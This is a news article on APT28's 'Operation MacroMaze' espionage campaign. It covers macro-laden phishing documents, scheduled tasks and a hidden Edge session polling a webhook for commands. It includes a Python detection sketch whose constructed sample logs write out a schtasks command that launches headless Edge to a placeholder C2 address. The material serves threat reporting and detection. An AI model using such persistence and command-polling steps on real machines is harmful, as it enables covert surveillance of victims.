Russian APT28 Hackers Used Malicious Documents to Spy on European Organizations

A well-known Russian cyber espionage group tracked as APT28 has been running a covert campaign against selected organizations in Western and Central Europe from September 2025 through January 2026, according to researchers. This operation has been identified as “Operation MacroMaze.”

Rather than using complex malware, the attackers relied on simple but clever techniques that abuse widely used services to help their malware stay under the radar.

How the Attack Worked

  • The operation started with spear-phishing emails sent to targeted individuals.
  • These emails carried malicious Office documents. When victims opened these files, they triggered requests to a public webhook service (a hosted endpoint that records any HTTP request sent to it), effectively notifying the attackers that the document had been opened.
  • Inside the document, a macro script was designed to launch a small program that set up a scheduled task on the victim’s computer.
  • This task executed a hidden Microsoft Edge browser session in the background. Through this session, the system contacted the webhook server to receive commands, ran them, and then sent back the results in the form of encoded HTML files.

This technique effectively turns a legitimate browser into part of the espionage toolset, blending the malicious traffic with normal activities and making detection harder.
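The chain described above (Office document, macro-launched helper, scheduled task, hidden Edge session) leaves a recognizable trail in process-creation telemetry. The following is an added detection sketch written for this article, not code from the researchers or from the campaign; it assumes a simplified pipe-delimited log format invented here, constructed sample records, a placeholder webhook domain, and that the hidden session shows up as Edge's `--headless` flag, which is an assumption since the real command lines are not given in the article.

```python
import re
from collections import defaultdict

# Constructed process-creation records: ts|host|parent_image|image|command_line
# (a simplified layout invented for this example, not a real vendor log schema).
SAMPLE_LOGS = [
    "2025-10-02T09:14:01Z|ws17|WINWORD.EXE|stage.exe|stage.exe",
    "2025-10-02T09:14:03Z|ws17|stage.exe|schtasks.exe|schtasks /create /tn Updater "
    "/tr \"msedge.exe --headless=new http://hooks.example.invalid/c2\" /sc minute /mo 10",
    "2025-10-02T09:24:00Z|ws17|svchost.exe|msedge.exe|msedge.exe --headless=new http://hooks.example.invalid/c2",
    "2025-10-02T09:30:00Z|ws22|explorer.exe|msedge.exe|msedge.exe https://intranet.example.invalid",
    "2025-10-02T09:31:00Z|ws22|WINWORD.EXE|splwow64.exe|splwow64.exe 12288",
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Children Office legitimately spawns (print helper); constructed allow-list, tune per environment.
OFFICE_BENIGN_CHILDREN = {"splwow64.exe"}
HEADLESS = re.compile(r"--headless\b")  # assumption: hidden session uses Edge's headless flag

def parse_line(line):
    ts, host, parent, image, cmd = line.split("|", 4)
    return {"ts": ts, "host": host, "parent": parent.lower(), "image": image.lower(), "cmd": cmd}

def rules_for(ev):
    """Return the names of the detection rules one record matches."""
    hits, cmd = [], ev["cmd"].lower()
    # Rule 1: an Office application spawning a non-allow-listed child (macro launching a helper)
    if ev["parent"] in OFFICE_APPS and ev["image"] not in OFFICE_BENIGN_CHILDREN:
        hits.append("office_spawn")
    # Rule 2: a scheduled task being created whose action is a headless Edge session
    if ev["image"] == "schtasks.exe" and "/create" in cmd and "msedge" in cmd and HEADLESS.search(cmd):
        hits.append("task_headless_edge")
    # Rule 3: headless Edge not started from the user's shell (e.g. by the task scheduler)
    if ev["image"] == "msedge.exe" and HEADLESS.search(cmd) and ev["parent"] != "explorer.exe":
        hits.append("headless_edge_nonuser")
    return hits

def detect(lines):
    """Group rule hits per host so the stages of the chain can be correlated."""
    per_host = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        per_host[ev["host"]].extend(rules_for(ev))
    return {h: r for h, r in per_host.items() if r}

def score_host(rule_hits):
    """Office spawn plus any headless-Edge stage on the same host is the full chain."""
    s = set(rule_hits)
    if "office_spawn" in s and s & {"task_headless_edge", "headless_edge_nonuser"}:
        return "high"
    return "medium" if s else "none"

if __name__ == "__main__":
    for host, hits in detect(SAMPLE_LOGS).items():
        print(host, score_host(hits), hits)
```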

Why This Matters

  • APT28 is widely believed to be state-sponsored and tied to Russia’s military intelligence (GRU). The group has a long track record of high-profile espionage and disruption campaigns targeting government agencies, military organizations, and critical infrastructure across Europe and beyond.
  • The use of basic tools and legitimate services in this campaign shows how threat actors can leverage ordinary software and infrastructure to carry out stealthy attacks.

In short, Operation MacroMaze isn’t about flashy malware — it’s about simple tools arranged cleverly to stay hidden while harvesting targeted information from compromised systems.